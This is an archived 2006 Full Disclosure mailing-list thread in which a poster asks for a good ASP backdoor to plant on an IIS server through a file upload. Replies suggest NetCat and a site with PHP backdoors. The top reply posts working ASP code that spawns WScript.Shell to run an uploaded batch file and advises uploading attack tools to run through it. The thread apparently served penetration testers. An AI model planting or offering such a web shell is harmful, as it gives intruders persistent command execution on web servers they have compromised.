Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: Re: Good ASP backdoor?

Re: Good ASP backdoor?

From: c0ntex <c0ntexb_at_gmail.com>
Date: Thu, 14 Sep 2006 23:43:11 +0100

Nothing spiffing but it works,

<%@ Page language="VB" Debug="true" aspcompat="true" %>
<%
    shell("C:\Program Files\WebApp\Uploads\owned.bat")
%>
<script runat=server>
   Sub blah()
       Dim SpawnShell = server.CreateObject("WScript.Shell")
       SpawnShell.Run("C:\Program Files\WebApp\Uploads\owned.bat")
   End sub
</script>

then just upload your tools and run via the bat file. Does the job.

On 14/09/06, Jason Miller <jammer128_at_gmail.com> wrote:
> http://replica-solutions.de/
> has some php based ones, check it out
>
> On 9/14/06, Exibar < exibar_at_thelair.com> wrote:
> > NetCat is a tried and true favorite....
> >
> >
> > ----- Original Message -----
> > From: "Lachniet, Mark" <mlachniet_at_sequoianet.com>
> > To: <full-disclosure_at_lists.grok.org.uk>
> > Sent: Thursday, September 14, 2006 2:44 PM
> > Subject: [Full-disclosure] Good ASP backdoor?
> >
> >
> > > Can anyone suggest a good backdoor for placing on a IIS server when you
> > > can upload a file to document root? For exapmle an all-in-one tool with
> > > upload, download, command execution, etc. There are several basic ones
> > > out there - I was wondering if anyone ever wrote a really spiffy one.
> > >
> > > Thanks in advance,
> > >
> > > Mark Lachniet
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

-- 
regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Sep 14 2006
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]